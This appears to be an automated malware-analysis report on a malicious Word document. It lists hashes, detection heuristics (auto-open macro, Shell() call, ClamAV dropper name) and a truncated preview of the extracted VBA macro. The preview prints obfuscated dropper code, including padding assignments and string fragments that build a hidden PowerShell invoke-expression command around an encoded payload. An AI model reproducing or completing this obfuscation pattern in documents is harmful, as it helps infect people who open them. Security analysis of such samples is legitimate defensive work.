Office (OLE) malware analysis — malicious · 248e01f5e9b5a1dd

MALICIOUS

Office (OLE)

230.5 KB Created: 2018-06-26 12:55:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 655ba96371ccfc883aca4acb3a5685c2 SHA-1: fa52c8ec2f70db0e8bae5d0e65f93bff8f1768a8 SHA-256: 248e01f5e9b5a1dd5ea5520f6f08cd5bee2642bb4f381475f7af2a0c45b3ad65

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags auto-executing VBA code that calls Shell. The ClamAV detection name 'Doc.Dropper.Agent-6592824-0' suggests this dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6600181-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6600181-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8392 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8392 bytes
SHA-256: `974e0f526c6300aca245b18e1739703b3942f79f486641b50457e92a08764a93`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "bGLvNzP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mfiEnVvaTPk" Function jGdMb() On Error Resume Next JDmzs = Sin(92883) lFKIuh = 24245 ZRmarz = CDate(52493) KwdwrS = 77688 wZXjj = 26947 fqVofi = IlmUKW AkMnzU = "Hell" + " ." + Chr(40) + " $Ps" + "HOME[4" + "]" + Chr(43) + "$Ps" + "HoMe[" + "34]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " $" JrivuC = CDate(56994) VtliaL = Sin(82219) svJjEP = XkwwMd EswwKA = 14775 CSZnb = 88983 YZCOD = 7576 IjPpDrJJR = Chr(40) + "SeT-iT" + "em 'vari" + "aBlE:ofs" + "' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [ST" + "rInG]" + Chr(40) + " " + "'123j" + "49Q10" + "E7_98{4" MLdvw = Sin(38044) oXXna = CDate(47504) qCnDN = uPWiOD YImCO = 1297 kzoitX = 49332 iDEhl = 86747 rTXOSFR = "9_58{4" + "0I114" + "v4" + "8Q6" + "1v5" + "3j58" + "I60>43>1" + "27E17" + "E58x43I" + "113I8j5" huKUYJ = 69260 PYLnal = 4215 tmQjw = 88749 OoPMRc = Sin(64373) jwHiDz = QkoMVh TQOGHn = CDate(97978) IYwKsKHu = "8>61j2" + "8>" + "51{54E58" + "{4" + "9j43" + "E1" + "00>123_6" + "2>26j44_" TinYuv = 92282 CQLfY = 43832 wJPbL = 97151 IzEBs = Sin(95591) oIPCBz = iqzqW ECZfqK = CDate(73751) hwksrClDRws = "98>1" + "20{5" + "5I43E4" + "3!4" + "7>" + "101" + "!112_1" + "12Q4" MBfHm = 62833 IRQwR = 87228 VstodC = 42332 fHdwi = Sin(46523) kTaZX = UrIGB MkbSa = CDate(39427) RpYiPN = "0x4" + "0>40" + "E113" + "Q43" + "E45E54x" + "49v" + "54" + "Q43I38{5" + "8_50E47" + "!54x4" + "5j5" NLcBV = 2071 LRZpRQ = 60584 jfJWUN = 61297 GRUPiP = Sin(58298) cnwvo = inSnqw AikUiz = CDate(16238) arqtzwCXS = "8j113_4" + "8x45" + "{56E" + "112v47" + "{41E6!53" + "!5" + "_42x1" + "3Q112" + "_31Q55v" + "43v43!47" BLEjtd = 50556 jXublP = 36227 SZFpIo = 69181 wqwWM = Sin(58896) DzHPbT = SmwhAS OOhoR = CDate(63987) VmWbDj = "I101j11" + "2!112E4" + "0_40>" + "40!113" + "_62I49j" + "51" + "v6" + "2>4" + "0Q51" + ">51I6" + "0j113j60" jGdMb = AkMnzU + IjPpDrJJR + rTXOSFR + IYwKsKHu + hwksrClDRws + RpYiPN + arqtzwCXS + VmWbDj bzSLVv = 94634 PHMIFV = 42597 qBvOnR = 82620 lYEDC = Sin(68955) GiNKww = uaQsN IBjMD = CDate(38337) End Function Function oZQlHB() On Error Resume Next NHEnGU = 53624 XYTjZ = 10575 psnKzG = 64475 soVrCs = Sin(12529) tREfV = ivwcAN XjEpN = CDate(6720) CkOFNKA = "x48x5" + "0{112I1" + "07" + ">27E47" + "!9E" + "112!3" + "1j55_43_" + "43!47" mmQBrY = 18293 LpsRf = 70386 GnfWY = 94293 tzNCw = Sin(19210) jTXij = zrOKC FCTXLw = CDate(2917) FPaaASwvDC = "v1" + "01E112I1" + "12_5" + "4v59v58" + "!62{51x" + "61" cCBlpl = 12089 RtmNzQ = 62336 uAHGq = 44824 IELMnM = Sin(57051) TUtzW = RjGWH hCMLll = CDate(76114) WnKJFirYi = "v62E5" + "1v62Q49Q" + "60!58>1" + "13I55E" + "42Q" + "112x1" LwrOkv = 1815 povlQ = 72700 KUtQHa = 8065 UhWYom = Sin(10707) WZhDRS = EMQUIb MbwwA = CDate(90967) AJEIcVa = "1Q111!" + "48v8>53I" + "112Q" + "31j55" + "{43I4" + "3x47{101" + "_112I1" + "12v40Q40" fbFiQ = 61429 cMWiU = 4555 nmCGYO = 69197 CORjn = Sin(99300) JLcsO = MCinDW KwvXU = CDate(93998) ZzqkoD = "_4" + "0I113_51" + "Q38E44Q" + "54E5" + "2I" + "48_4" + "1_11" + "3>45_4" + "2{11" + "2_7I61!1" + "03x59E1" + "02j10" GLAtnv = 73683 tKvdz = 56336 TWWiw = 30597 KAQCZ = Sin(85909) JPGGSQ = jWOwEz KaVjta = CDate(50618) MqDsRCAvS = "8{21>1" + "12" + "x31{55" + "{4" + "3I43v" + "47j101I1" + "12j112" + "!39v6" + "2!53" + ">57" NNWBfi = 53203 YPzJZo = 46675 hCXHU = 22545 nlMdmF = Sin(26937) CNNDEF = fVrSL LouENp = CDate(26719) wSJAItnb = "_56" + "E37E11" + "3E6" + "0{48v50Q" + "112!" + "61>10" + "2E26" + "E56E8" aGjXz = 40177 HOSrN = 54093 fpZITM = 23026 QLkQLk = Sin(15472) Ecbhp = MXaiir LYYwz = CDate(32755) mOOLTUt = "!11" + "2v1" + "20_113Q1" + "2!47x51>" + "54j43" + "I1" + "19>" + "12" + "0I31E12" + "0x118" OkvOMB = 11200 aiziW = 35486 OtSjz = 44399 EZUwab = Sin(4091) ... (truncated)

SHA-256: 974e0f526c6300aca245b18e1739703b3942f79f486641b50457e92a08764a93

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "bGLvNzP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mfiEnVvaTPk"
Function jGdMb()
On Error Resume Next
JDmzs = Sin(92883)
lFKIuh = 24245
ZRmarz = CDate(52493)
KwdwrS = 77688
wZXjj = 26947
fqVofi = IlmUKW
AkMnzU = "Hell" + " ." + Chr(40) + " $Ps" + "HOME[4" + "]" + Chr(43) + "$Ps" + "HoMe[" + "34]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " $"
JrivuC = CDate(56994)
VtliaL = Sin(82219)
svJjEP = XkwwMd
EswwKA = 14775
CSZnb = 88983
YZCOD = 7576
IjPpDrJJR = Chr(40) + "SeT-iT" + "em 'vari" + "aBlE:ofs" + "' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [ST" + "rInG]" + Chr(40) + " " + "'123j" + "49Q10" + "E7_98{4"
MLdvw = Sin(38044)
oXXna = CDate(47504)
qCnDN = uPWiOD
YImCO = 1297
kzoitX = 49332
iDEhl = 86747
rTXOSFR = "9_58{4" + "0I114" + "v4" + "8Q6" + "1v5" + "3j58" + "I60>43>1" + "27E17" + "E58x43I" + "113I8j5"
huKUYJ = 69260
PYLnal = 4215
tmQjw = 88749
OoPMRc = Sin(64373)
jwHiDz = QkoMVh
TQOGHn = CDate(97978)
IYwKsKHu = "8>61j2" + "8>" + "51{54E58" + "{4" + "9j43" + "E1" + "00>123_6" + "2>26j44_"
TinYuv = 92282
CQLfY = 43832
wJPbL = 97151
IzEBs = Sin(95591)
oIPCBz = iqzqW
ECZfqK = CDate(73751)
hwksrClDRws = "98>1" + "20{5" + "5I43E4" + "3!4" + "7>" + "101" + "!112_1" + "12Q4"
MBfHm = 62833
IRQwR = 87228
VstodC = 42332
fHdwi = Sin(46523)
kTaZX = UrIGB
MkbSa = CDate(39427)
RpYiPN = "0x4" + "0>40" + "E113" + "Q43" + "E45E54x" + "49v" + "54" + "Q43I38{5" + "8_50E47" + "!54x4" + "5j5"
NLcBV = 2071
LRZpRQ = 60584
jfJWUN = 61297
GRUPiP = Sin(58298)
cnwvo = inSnqw
AikUiz = CDate(16238)
arqtzwCXS = "8j113_4" + "8x45" + "{56E" + "112v47" + "{41E6!53" + "!5" + "_42x1" + "3Q112" + "_31Q55v" + "43v43!47"
BLEjtd = 50556
jXublP = 36227
SZFpIo = 69181
wqwWM = Sin(58896)
DzHPbT = SmwhAS
OOhoR = CDate(63987)
VmWbDj = "I101j11" + "2!112E4" + "0_40>" + "40!113" + "_62I49j" + "51" + "v6" + "2>4" + "0Q51" + ">51I6" + "0j113j60"
jGdMb = AkMnzU + IjPpDrJJR + rTXOSFR + IYwKsKHu + hwksrClDRws + RpYiPN + arqtzwCXS + VmWbDj
bzSLVv = 94634
PHMIFV = 42597
qBvOnR = 82620
lYEDC = Sin(68955)
GiNKww = uaQsN
IBjMD = CDate(38337)
End Function
Function oZQlHB()
On Error Resume Next
NHEnGU = 53624
XYTjZ = 10575
psnKzG = 64475
soVrCs = Sin(12529)
tREfV = ivwcAN
XjEpN = CDate(6720)
CkOFNKA = "x48x5" + "0{112I1" + "07" + ">27E47" + "!9E" + "112!3" + "1j55_43_" + "43!47"
mmQBrY = 18293
LpsRf = 70386
GnfWY = 94293
tzNCw = Sin(19210)
jTXij = zrOKC
FCTXLw = CDate(2917)
FPaaASwvDC = "v1" + "01E112I1" + "12_5" + "4v59v58" + "!62{51x" + "61"
cCBlpl = 12089
RtmNzQ = 62336
uAHGq = 44824
IELMnM = Sin(57051)
TUtzW = RjGWH
hCMLll = CDate(76114)
WnKJFirYi = "v62E5" + "1v62Q49Q" + "60!58>1" + "13I55E" + "42Q" + "112x1"
LwrOkv = 1815
povlQ = 72700
KUtQHa = 8065
UhWYom = Sin(10707)
WZhDRS = EMQUIb
MbwwA = CDate(90967)
AJEIcVa = "1Q111!" + "48v8>53I" + "112Q" + "31j55" + "{43I4" + "3x47{101" + "_112I1" + "12v40Q40"
fbFiQ = 61429
cMWiU = 4555
nmCGYO = 69197
CORjn = Sin(99300)
JLcsO = MCinDW
KwvXU = CDate(93998)
ZzqkoD = "_4" + "0I113_51" + "Q38E44Q" + "54E5" + "2I" + "48_4" + "1_11" + "3>45_4" + "2{11" + "2_7I61!1" + "03x59E1" + "02j10"
GLAtnv = 73683
tKvdz = 56336
TWWiw = 30597
KAQCZ = Sin(85909)
JPGGSQ = jWOwEz
KaVjta = CDate(50618)
MqDsRCAvS = "8{21>1" + "12" + "x31{55" + "{4" + "3I43v" + "47j101I1" + "12j112" + "!39v6" + "2!53" + ">57"
NNWBfi = 53203
YPzJZo = 46675
hCXHU = 22545
nlMdmF = Sin(26937)
CNNDEF = fVrSL
LouENp = CDate(26719)
wSJAItnb = "_56" + "E37E11" + "3E6" + "0{48v50Q" + "112!" + "61>10" + "2E26" + "E56E8"
aGjXz = 40177
HOSrN = 54093
fpZITM = 23026
QLkQLk = Sin(15472)
Ecbhp = MXaiir
LYYwz = CDate(32755)
mOOLTUt = "!11" + "2v1" + "20_113Q1" + "2!47x51>" + "54j43" + "I1" + "19>" + "12" + "0I31E12" + "0x118"
OkvOMB = 11200
aiziW = 35486
OtSjz = 44399
EZUwab = Sin(4091)

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.